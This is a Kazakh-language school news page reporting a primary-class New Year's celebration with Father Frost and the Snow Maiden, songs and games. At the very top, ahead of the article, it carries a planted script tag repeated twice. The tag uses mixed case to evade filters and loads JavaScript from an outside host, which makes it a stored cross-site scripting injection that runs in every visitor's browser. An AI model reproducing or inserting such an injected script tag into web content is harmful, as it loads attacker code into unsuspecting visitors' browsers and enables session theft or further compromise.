<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

07.01.2017

Жаңажылдық іс-шара

Ғ. Әбдірахманұлы атындағы Қима орта мектебінде 28 желтоқсан күні, бастауыш сынып арасында, жаңа жылдық шырша мерекесі өткізілді. Жауапты сынып жетекшілері жаңа жылдық мерекесін жоғары деңгейде өткізді. 2 сынып жетекшісі Макишева Куралай Дабылқызы «Кел жаңа жыл, жаңа жыл» атты жаңа жылдық кеште, ата-аналар мен оқушылар арасында белсенді жүргізе білді. Кештің мақсаты: балалардың көңіл-күйлерін көтеру, Аяз ата мен Ақшақарға деген шынайы сенімділік тудыру.

Жүргізуші алдыменен ата-аналарды, ұстаздарды, оқушыларды жаңа жылмен құттықтады. 2 сынып оқушыларының орындауында «Жаңа жыл» әні орындалды. Көптен күткен Аяз ата мен Ақшақар да сыйлықтарымен келіп, шыршымызды жандандырды. Оқушылар ортада ән айтып, би билеп, ойын ойнады. Ақшақар мен Аяз ата балалардың көңілінен шығу үшін, жас балаша би билеп, ән айтты. Ең бастысы өткен жылға өкпе жоқтығын, келген жылдан көп жақсылық күтетінін айтып өтті. Жүргізуші оқушыларға түрлі сұрақтар қойып, жұмбақтар жасырды. Ата-аналар мен балалар арасында ойындар жүргізілді. «Шырша», «Әліппе», «Кәмпит», «Сыйлықтарға толы қорап» ойынын өткізді.

Жаңа жылдық ойын-сауық кешінің соңында, Аяз ата мен Ақшақар оқушыларға ризашылығын білдіріп сыйлықтарды таратып, қоштаса кете барды.

Просмотров: 691


Пікір қосу



Деректерді қолтаңбаға қосу